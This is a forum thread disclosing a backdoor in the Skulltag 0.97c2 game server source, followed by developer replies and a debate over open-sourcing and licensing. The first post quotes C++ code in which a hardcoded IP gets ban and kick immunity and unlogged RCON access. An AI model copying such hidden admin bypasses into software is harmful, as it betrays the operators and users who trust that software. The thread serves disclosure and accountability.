Skulltag 0.97c2 Server Backdoor

Firstly - I'm a long time Skulltag player, I love ST and I want to continue to play it, therefore I would like to remain anonymous.
Consider this post an act of whistleblowing that will hopefully help improve the port in the end.

Some of you might remember the csDoom backdoor incident. The creator of csDoom (Fly) added a backdoor to the server binaries which would grant him RCON rights on any server.
A similar backdoor was implemented by Carnevil as can be seen in the recently released 0.97c2 source code.

sv_admin.cpp:
Here we can see Carnevils hardcoded IP address and a function that will return true, if a given address is included in the Adminlist! Note that this code was written with expandability in mind.

void SERVER_ADMIN_Construct( void )
{
	g_AdminList[ADMIN_CARNEVIL].Address.ip[0] = 24;
	g_AdminList[ADMIN_CARNEVIL].Address.ip[1] = 242;
	g_AdminList[ADMIN_CARNEVIL].Address.ip[2] = 214;
	g_AdminList[ADMIN_CARNEVIL].Address.ip[3] = 13;
}

bool SERVER_ADMIN_IsAdministrator( netadr_t Address )
{
	ULONG	ulIdx;

	for ( ulIdx = 0; ulIdx < NUM_ADMINS; ulIdx++ )
	{
		if ( NETWORK_CompareAddress( g_AdminList[ulIdx].Address, Address, true ))
			return ( true );
	}

	return ( false );
}
Let us have a look where this function is used and what IP addresses listed in the secret Adminlist can do:

all of the following code is from sv_main.cpp:
They cannot be banned from the server!
if (( sv_enforcebans ) && ( SERVERBAN_IsIPBanned( szAddress[0], szAddress[1], szAddress[2], szAddress[3] )) 
&& ( SERVER_ADMIN_IsAdministrator( clients[lClient].address ) == false ))
{
	// Client has been banned! GET THE FUCK OUT OF HERE!
	SERVER_ClientError( lClient, NETWORK_ERRORCODE_BANNED );
	return;
}
They can issue "silent" RCON commands that will not be printed.
// If they don't have RCON access, and aren't an adminstrator, deny them the ability to do this.
if (( clients[parse_cl].bRCONAccess == false ) && ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false ))
	return ( false );

// Admins can operate incognito.
if ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false )
	Printf( "%s RCON (%s)\n", players[parse_cl].userinfo.netname, pszCommand );
They cannot be kicked from the game or server!
if ( stricmp( szPlayerName, argv[1] ) == 0 )
{
	if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address ))
		continue;

	// If we provided a reason, give it.
	if ( argv.argc( ) >= 3 )
		SERVER_KickPlayer( ulIdx, argv[2] );
	else
		SERVER_KickPlayer( ulIdx, "None given." );

	return;
}
if ( stricmp( szPlayerName, argv[1] ) == 0 )
	{
		if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address ))
			continue;

		// Already a spectator!
		if ( PLAYER_IsTrueSpectator( &players[parse_cl] ))
			continue;

		// If we provided a reason, give it.
		if ( argv.argc( ) >= 3 )
			SERVER_KickPlayerFromGame( ulIdx, argv[2] );
		else
			SERVER_KickPlayerFromGame( ulIdx, "None given" );

		return;
	}
All of the above probably applies to ScoreDoomST, which is based on 0.97c2, as well.
Now this backdoor might or might not be present in the current ST source code.

What caught my eye though in the recent changelog was the implementation of a server-side whitelist and adminlist, with similar functionality, meant for server hosts only. For more details check out the Wiki.

The Skulltag master-server is distributing a global banlist to all servers. As this and this post suggest a global whitelist is distributed as well.
Now what if all the server-side lists have been implemented at the global level and the master-server is also distributing a secret adminlist to all servers (maybe the global adminlist IP checks are done directly on the master though)?

If a backdoor of any kind is still present it would be a huge security risk and massive breach of trust between server hosts and the ST administration.
Someone who is skilled in Reverse Engineering might want to check the current server master communication for a 'third list' or other suspicious queries to confirm my worries.

An official statement from the administration confirming or disputing the existence of a "master adminlist" or any other form of backdoor could clear things up.
Since Skulltag is closed source we ultimately have to trust the official statement from the administration.
Releasing older source code so we can at least see since when the backdoor was present would be a first step.
I guess this incident will make the administration cautious to remove incriminating code from future source code releases though. Some viable options to regain trust would be to go fully open source or allow some neutral members from the DooM community to review the code in person by visiting one of the developers IRL.

I know that some prominent figures from the doom community, like AlexMax, Ladna, Gez and Graf Zahl, are actively pushing for Skulltag to be open sourced.
Ladna said it best in the previously linked altdeath thread:

ST keeping a current, open-source version would at least prevent something like the current situation with ZDaemon by allowing us the "fuck you jerks" option.

He is absolutely right! The players should have all the power. The programmers should just do their job and write code instead. If the programmers or admins try to deceive the players the project can be forked easily!

I would be very pleased if ST became a truly free port like Odamex and they could finally share code and join forces!
Maybe this negative incident here can be turned into something positive and accelerate that process.

Share this post


Link to post

So Carnevil made everyone his bitch and called them noobs on top of that?

Awwwwww <3

Not even in those CS parody videos do you see that degree of "pwn" and "win" ;-)

Share this post


Link to post
mandax said:

They can issue "silent" RCON commands that will not be printed.

Now they should implement "rcon exec cmdline [cmdshow]"

Share this post


Link to post

mandax said:
An official statement from the administration confirming or disputing the existence of a "master adminlist" or any other form of backdoor could clear things up.

There is no "master adminlist", the only thing the master distributes is a banlist and a whitelist that puts exemptions to the master banlist. You can view those lists with "viewmasterbanlist" and "viewmasterexemptionbanlist". And the master bans can be turned off by setting sv_enforcemasterbanlist to false. The code you showed above was removed approximately two and a half years ago from Skulltag. I myself wasn't really aware that there was a built in backdoor for a long time, but I didn't check the code for such a thing when I joined ST.

Due to the best of my knowledge there is no backdoor of any kind in Skulltag ever since the code you posted was removed. Furthermore, I would never add such a thing or tolerate it in any way. I have to admit that I didn't read every line of code though.

Share this post


Link to post

The IPv4 addresses that are defined in the old code, are most likely useless now as those that did have that access before might not have access today. However, it is still a good idea that ports that use the SkullTag 97c2 source (ScoreDoom, for example) to expunge that code.

Share this post


Link to post

I consider this a very serious issue and I'm surprised by the general apathy it is met with. Makes it seem as if people don't care about backdoors at all.

Tiger said:

The IPv4 addresses that are defined in the old code, are most likely useless now as those that did have that access before might not have access today.

I am not sure why you try to downplay the issue here. It does not matter how effective the backdoor would be today. What matters is the existence of the backdoor in the first place and the implications it has on security and trust!

AlexMax said:

I'm flattered that you linked to altdeath. Now let me link to something you'll like:

It's nice that we share the same interest regarding open source, but did you even read the rest of my post?
Usually I see you weigh in on all kinds of topics with valuable input. It just irritates me that you have nothing to say regarding the main issue at hand.
Son ... I am disappoint! Are you afraid to bite the hand that feeds you? ;)

Torr I really respect you and all you do for ST, but I have not been expecting such a "politician" like answer ;)

Torr_Samaho said:

There is no "master adminlist", the only thing the master distributes is a banlist and a whitelist that puts exemptions to the master banlist.

If there is no list that is distributed, is there maybe some functionality on the master to check if a player should get some 'special' rights on
a server. E.g. "server sends a message to the master about a connected player and the master then checks some list and tells the server
whether to set a flag for that player" or anything of that kind?
I am explicitly asking about the existence of such a mechanism regardless of it being used or not at the moment (in case the list is empty).

Torr_Samaho said:

The code you showed above was removed approximately two and a half years ago from Skulltag. I myself wasn't really aware that there was a built in backdoor for a long time, but I didn't check the code for such a thing when I joined ST.

When and how did you learn about the backdoor? At what point was the backdoor removed and by whom? When was it introduced for the first time?
I'm feeling a bit stupid to even ask these questions, because I expected it would be natural to disclose all information regarding the backdoor when you get caught with your hands in the cookie jar.

Torr_Samaho said:

I have to admit that I didn't read every line of code though.

Then it would be time to review critical parts of the code and to publicly disclose any irregularities that have been found.
The last thing I want to see in the future are source code releases with tampered timestamps or binaries build with the same toolchain to have a different hash than the officially released binaries at that time. Or even worse ... no source releases between the last and current version at all.

Share this post


Link to post

I wish I could say I was surprised. I've never been convinced by the claims made by authors of multiplayer source ports that their source code must be kept secret for security reasons. Aside from the fact that it doesn't really add any security, the alternative explanation that they're simply unwilling to relinquish their positions of power has always seemed to me to be far more likely.

Share this post


Link to post
mandax said:

I consider this a very serious issue and I'm surprised by the general apathy it is met with. Makes it seem as if people don't care about backdoors at all.


Of course I care about that issue; however, I also realize that Torr or maybe Rivecoder have already expunged that code. When your post was first introduced into a testing channel, few members have already begun contemplating about creating a ticket report in regards to expunging that code. However, it was Torr's post that caught us up to speed about that issue. If it was still active today, there better be one hell of a good explanation for it.

mandax said:

I am not sure why you try to downplay the issue here


Can you elaborate what you mean by "downplay the issue"?

mandax said:

It does not matter how effective the backdoor would be today. What matters is the existence of the backdoor in the first place and the implications it has on security and trust!


I understand where you are coming from; however, I will not speak for Carnevil nor the older administration about their protocols regarding that matter. If you want to speak to Carnevil yourself about that issue, be my guest at all means.

mandax said:

It's nice that we share the same interest regarding open source, but did you even read the rest of my post?
Usually I see you weigh in on all kinds of topics with valuable input. It just irritates me that you have nothing to say regarding the main issue at hand.
Son ... I am disappoint! Are you afraid to bite the hand that feeds you? ;)


I'll be honest, your edited topic post that now includes 'Open Source' is more towards "Jumping on the bandwagon!" in which I highly disagree with. If SkullTag was just primarily discussing Open Source in terms of just 'Jumping into the bandwagon', I would highly protest it. For example, it's like convincing Microsoft to go completely open source just because Linux is primarily open source. However, if there is reasonable benefits for Open Source, then I'll agree with the movement.

Share this post


Link to post
Tiger said:

However, if there is reasonable benefits for Open Source, then I'll agree with the movement.

There are bastardloads of benefits -- just the fact that it's open for public contributions is a serious increase for potential new features, enhancements, bugfixes, and all that jazz. Just look at ZDoom: if it wasn't open source, there'd be no extended DECORATE, SBARINFO, software 3Dfloors, GZDoom, or Skulltag itself. All of these were added / created by external developers with access to the source, and that's just scratching the tip of the proverbial iceberg. Somehow, though, I figure you know this and were just raising a separate point of some sort.

I'd also say that open-sourcing things would help with keeping ST closer to sync with ZDoom, but I'm not sure about the mechanics involved in such. I at least know that the current desync is due to ZDoom's current state of stability, not ST's, but that's about it.

Share this post


Link to post

Just to cite two ZDoom features that Skulltag cannot use without being open source, for license reasons, the OPL emulator and FraggleScript support code.

Share this post


Link to post
mandax said:

I consider this a very serious issue and I'm surprised by the general apathy it is met with. Makes it seem as if people don't care about backdoors at all.

It's old, it doesn't exist anymore, and if they didn't want you to see it, they wouldn't have released the source code. The person who allowed the backdoor in Skulltag does not work on Skulltag anymore, so exactly who are we supposed to be yelling at?

mandax said:

Torr I really respect you and all you do for ST, but I have not been expecting such a "politician" like answer ;)

Torr's post was basically "I removed it as soon as I was aware of it two and a half years ago. It is not in Skulltag anymore." Exactly how much more straightforward of an answer can you get?

Share this post


Link to post
mandax said:

Torr I really respect you and all you do for ST, but I have not been expecting such a "politician" like answer ;)

I'm confused. I thought the following is completely unambiguous:

Torr_Samaho said:

Due to the best of my knowledge there is no backdoor of any kind in Skulltag ever since the code you posted was removed. Furthermore, I would never add such a thing or tolerate it in any way.

mandax said:

If there is no list that is distributed, is there maybe some functionality on the master to check if a player should get some 'special' rights on
a server. E.g. "server sends a message to the master about a connected player and the master then checks some list and tells the server
whether to set a flag for that player" or anything of that kind?
I am explicitly asking about the existence of such a mechanism regardless of it being used or not at the moment (in case the list is empty).

Good grief, is your impression of me really that bad that you think I'd willingly try to hide such a backdoor with an evasive trick answer? Not to mention that the statement I made in the second paragraph IMHO is unambiguous. "no backdoor of any kind" of course also means that there are no secret currently unused lists to get control over a server or anything.

mandax said:

When and how did you learn about the backdoor? At what point was the backdoor removed and by whom? When was it introduced for the first time?

Rivecoder removed the code in revision 1657 on 15. Sep. 2008 from the main trunk, I ported the change shortly after to the latestzdoom branch, i.e. removed it from that branch. IIRC I noticed the backdoor only when Rivecoder removed it because I looked into sv_admin.cpp to see what he removed there. I don't know when Rivecoder first noticed the backdoor, but I assume that he stumbled upon it shortly before removing it. Since I myself was never really interested in the "control" stuff like banning or RCON, I didn't notice it earlier.

mandax said:

I'm feeling a bit stupid to even ask these questions, because I expected it would be natural to disclose all information regarding the backdoor when you get caught with your hands in the cookie jar.

You can hardly assume that I have read the complete source before making any releases, can you? So I don't see how I have been caught with anything. Are you even aware that I was the one pulling the strings in the background to make the release of the 97c2 source happen at all?

mandax said:

Then it would be time to review critical parts of the code and to publicly disclose any irregularities that have been found.

By now I have touched pretty much all parts of the code. I would be very surprised if there is any other backdoor hidden somewhere. Rivecoder left the team a while ago, so I was pushed to also work on the control stuff since then.

mandax said:

The last thing I want to see in the future are source code releases with tampered timestamps or binaries build with the same toolchain to have a different hash than the officially released binaries at that time.

Unless we decide to go completely open source, it is possible that I will strip the released sources of some hack countermeasures. Not that these are very effective or sophisticated, but when the source of them is released they are completely useless.

Share this post


Link to post
mandax said:

He is absolutely right! The players should have all the power. The programmers should just do their job and write code instead. If the programmers or admins try to deceive the players the project can be forked easily!

Yeah, source port programmers should just shut up and do their job! That's what they're paid to do! Oh, wait..

Anyways, I am sure open-sourcing will bring some contributions from people, but I wouldn't expect any significant forks. When ZDaemon's source was closed, nobody bothered to step up and make a significant fork of the open-source edition.

Torr is a great guy who would never put in a backdoor, but if he ever gets tired of working on Skulltag, I hope he shares the source, cause Skulltag probably won't have another lead coder like him.

Share this post


Link to post
Spleen said:

Anyways, I am sure open-sourcing will bring some contributions from people, but I wouldn't expect any significant forks. When ZDaemon's source was closed, nobody bothered to step up and make a significant fork of the open-source edition.


Odamex was in the works nearly from the moment that Kilgore promised that 1.07 would be closed source. ZDaemon's 1.06 was a non-option, as the GPL license it was under was not legal due to the inclusion of BUILD and RSL licenced code; essentially making the entire source release invalid.

Rather than try and untangle the resulting web of licenses and risk the possibility of some of Odamex's features being poached by ZDaemon (or Skulltag), the Odamex team decided to start with an unambiguously GPL codebase.

Share this post


Link to post
AlexMax said:

Odamex was in the works nearly from the moment that Kilgore promised that 1.07 would be closed source. ZDaemon's 1.06 was a non-option, as the GPL license it was under was not legal due to the inclusion of BUILD and RSL licenced code; essentially making the entire source release invalid.

Rather than try and untangle the resulting web of licenses and risk the possibility of some of Odamex's features being poached by ZDaemon (or Skulltag), the Odamex team decided to start with an unambiguously GPL codebase.

Ah, that explains it. I guess I'm wrong, nevermind. Interesting history btw.

Share this post


Link to post
Spleen said:

Yeah, source port programmers should just shut up and do their job! That's what they're paid to do! Oh, wait..

Anyways, I am sure open-sourcing will bring some contributions from people, but I wouldn't expect any significant forks. When ZDaemon's source was closed, nobody bothered to step up and make a significant fork of the open-source edition.

Torr is a great guy who would never put in a backdoor, but if he ever gets tired of working on Skulltag, I hope he shares the source, cause Skulltag probably won't have another lead coder like him.


I have to commend Torr too. When I had questions about the source-code and needed help with some bugs, he was very helpful and positive.

Share this post


Link to post
AlexMax said:

Rather than try and untangle the resulting web of licenses and risk the possibility of some of Odamex's features being poached by ZDaemon (or Skulltag), the Odamex team decided to start with an unambiguously GPL codebase.

Wasn't there Raven code that had to be ripped out because it wasn't GPL at the time?

Share this post


Link to post

Yes, Randy's condition for relicensing ZDoom under the GPL was to remove the Raven code. Which the Odamex team did so zealously they also removed Raven-related code that was written by Randy before the Hexen source code was released (such as ACS and Hexen map format support).

Share this post


Link to post
Gez said:

Yes, Randy's condition for relicensing ZDoom under the GPL was to remove the Raven code. Which the Odamex team did so zealously they also removed Raven-related code that was written by Randy before the Hexen source code was released (such as ACS and Hexen map format support).

Did they rip out Build code too, or did ZDoom not have any Build code back then?

Share this post


Link to post
Spleen said:

Did they rip out Build code too, or did ZDoom not have any Build code back then?

It was before slopes, so there's probably none.

Share this post


Link to post

Thank you for the answers Torr and sorry for the harsh interrogation ;)

Gez said:

Just to cite two ZDoom features that Skulltag cannot use without being open source, for license reasons, the OPL emulator and FraggleScript support code.


Regarding the OPL emulation:

Torr_Samaho said:

Unless we decide to go completely open source, it is possible that I will strip the released sources of some hack countermeasures.

+

MAME 0.95 license:

If you use portions of the MAME source code in your program, however, you must make the full source code freely available as well.

Does not compute!

Tiger said:

I'll be honest, your edited topic post that now includes 'Open Source' is more towards "Jumping on the bandwagon!" in which I highly disagree with.

Not a single post I made was edited. You must have missed the 'Open Source' part the first time you read it. Nevertheless I welcome your sudden change of mind 48 hours later to "jump on the bandwagon" yourself.

Share this post


Link to post
mandax said:

Nevertheless I welcome your sudden change of mind 48 hours later to "jump on the bandwagon" yourself.


"Forming an informed opinion" is not the same as "Jumping on the bandwagon".

I fully support an open source Skulltag, but you are being too zealous in your campaign. Though it seems you may have spurred along discussions, so there is that to your credit.

Share this post


Link to post
Torr_Samaho said:

Right after the license of the OPL code was brought to my attention I immediately announced that I will simply remove the OPL emulation

I was aware of the OPL emulation being removed and was rather commenting on Gez' flawed implication ...

Gez said:

... features that Skulltag cannot use without being open source ...

... that going 'Open Source' would allow the reintroduction of the OPL emulation code.

phi108 said:

Though it seems you may have spurred along discussions, so there is that to your credit.

I would be happy if this was indeed the case. The GPL relicensing Torr plans to allow would finally breathe new life into Odamex development as well.

Share this post


Link to post

It's not a flawed implication. "It is possible" isn't the same thing as "we'll definitely do it".

Share this post


Link to post

It's completely unacceptable that Skulltag contains the MAME-derived OPL emulator. Either all of the posted binaries that contain this code must be removed, or the source for them must be released. Simply removing the code from version control is insufficient. This is extremely disappointing.

===

And Torr I'm not sure if you're aware, but unless all Skulltag contributors sign over their copyright you can't just relicense their work. Copyright (at least in the US) doesn't work that way. For example, if I'd ever contributed code to Skulltag (under its 17 different license agreements) you'd need my permission to release it under a different license or licenses unless I explicitly transferred copyright to you or some other legal entity.

Share this post


Link to post
Ladna said:

And Torr I'm not sure if you're aware, but unless all Skulltag contributors sign over their copyright you can't just relicense their work. Copyright (at least in the US) doesn't work that way. For example, if I'd ever contributed code to Skulltag (under its 17 different license agreements) you'd need my permission to release it under a different license or licenses unless I explicitly transferred copyright to you or some other legal entity.


And it begins....


Thanks Carn, for this wonderful license you picked!

Share this post


Link to post

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now